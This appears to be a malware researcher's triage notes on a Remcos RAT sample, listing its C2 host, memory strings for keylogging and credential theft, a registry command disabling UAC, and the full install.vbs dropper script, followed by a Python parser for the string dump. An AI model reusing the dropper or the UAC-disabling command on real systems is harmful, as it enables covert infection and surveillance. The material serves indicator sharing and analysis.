found by Keith Smith @SevenLayerJedi #remcos rat
https://twitter.com/SevenLayerJedi/status/980809311042629634
https://pastebin.com/raw/x7DJ9Drj
https://www.hybrid-analysis.com/sample/6050fea1bb63a53a31b0e1ed957427a1d916115c83dffaf2b2d5c25bcc51b146/5ac22fed7ca3e10787046705

The exe ran and created a new chrome.exe process, from which it does its bidding.

-------------- files seen --------------
C:\Users\xxx\AppData\Roaming\remcos\remcos.exe
C:\Users\xxx\AppData\Local\temp\install.vbs
chrome.exe

-------------- network connections --------------
georgeoffor.ddns.net
213.183.58.61
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@

-------------- interesting in memory strings --------------
0x301994 (166): "C:\Windows\System32\WScript.exe" "C:\Users\Win732\AppData\Local\Temp\install.vbs"
0x413658 (11): CloseCamera
0x413664 (10): OpenCamera
0x41385c (23): Uploading file to C&C:
0x413884 (25): Offline Keylogger Started
0x4138b0 (27): { User has been idle for
0x4138cc (12): minutes }
0x4138dc (24): Online Keylogger Started
0x4138f8 (24): Online Keylogger Stopped
0x413914 (25): Offline Keylogger Stopped
0x413c00 (38): [Chrome StoredLogins found, cleared!]
0x413d0c (32): [Firefox StoredLogins cleared!]
0x414210 (24): \install.vbs
0x4142f0 (28): \uninstall.vbs
0x414398 (22): \update.vbs
0x41444c (24): \restart.vbs
0x4146c4 (27): C:\Windows\System32\cmd.exe
0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0x4148b4 (17): Connected to C&C!
0x4148c8 (34): Initializing connection to C&C...
0x414d74 (27): * Breaking-Security.Net
0x414d90 (11): * REMCOS v
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
0x817039 (11): Screenshots
0x817579 (23): Software\Remcos-SCLZ2Y\
0x817aa2 (94): C:\Users\xxx\AppData\Roaming\remcos\logs.dat

-------------- interesting api calls seen --------------
chrome.exe CreateDirectoryW ( "C:\Users\xxx\AppData\Roaming\remcos", NULL ) FALSE
chrome.exe CreateFileW ( "C:\Users\xxx\AppData\Roaming\remcos\logs.dat", GENERIC_READ, FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL )
chrome.exe gethostbyname ( "georgeoffor.ddns.net" ) 0x00386da8 0.0003958

-------------- interesting file found install.vbs --------------
WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
fso.DeleteFile "C:\Users\xxx\Desktop\bad.exe"
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\xxx\AppData\Roaming\remcos\remcos.exe""", 0
fso.DeleteFile(Wscript.ScriptFullName)
--------------
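As an added triage example (not part of the original notes or of Remcos itself): a small Python parser for the "0xADDR (LEN): string" dump format used above that buckets each string into a heuristic category and pulls the host and port out of the Remcos-style config string. The category keywords and the host:port:password| layout are assumptions drawn from the strings listed in this post.

```python
import re

# Constructed sample: a subset of the memory strings listed in the post above.
SAMPLE_DUMP = r"""0x413884 (25): Offline Keylogger Started
0x413c00 (38): [Chrome StoredLogins found, cleared!]
0x4146e0 (129): /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
0x4148b4 (17): Connected to C&C!
0x812cd1 (42): georgeoffor.ddns.net:1990:pass|@@Host@@5@@
0x817039 (11): Screenshots
"""
# One dump line: hex address, declared length in parentheses, then the string.
LINE_RE = re.compile(r"^0x([0-9a-fA-F]+) \((\d+)\): (.*)$")
# host:port:password|... as in the config string above (layout assumed here).
CONFIG_RE = re.compile(r"^([\w.-]+):(\d{1,5}):([^|]*)\|")
# Heuristic buckets (assumed for this example) keyed on substrings from the dump.
CATEGORIES = {
    "keylogger": ("Keylogger",),
    "credential_theft": ("StoredLogins",),
    "uac_disable": ("EnableLUA",),
    "c2": ("C&C",),
    "surveillance": ("Screenshots", "Camera"),
}

def parse_dump(text):
    """Yield (address, declared_len, string) for each well-formed dump line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1), 16), int(m.group(2)), m.group(3)

def classify(string):
    """Return the set of heuristic categories whose needles occur in string."""
    return {cat for cat, needles in CATEGORIES.items()
            if any(n in string for n in needles)}

def extract_c2(string):
    """Return (host, port) when string looks like a host:port:pass| config."""
    m = CONFIG_RE.match(string)
    return (m.group(1), int(m.group(2))) if m else None

def triage(text):
    """Map each category to the addresses that hit it; collect C2 endpoints."""
    hits, c2 = {}, []
    for addr, _, s in parse_dump(text):
        for cat in classify(s):
            hits.setdefault(cat, []).append(addr)
        endpoint = extract_c2(s)
        if endpoint:
            c2.append(endpoint)
    return {"categories": hits, "c2": c2}
```

Running triage(SAMPLE_DUMP) on the constructed sample reports the EnableLUA registry string at 0x4146e0 under uac_disable and georgeoffor.ddns.net:1990 as the C2 endpoint.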
Monday, April 2, 2018
Remcos rat sample
https://pastebin.com/raw/WQ2k21mE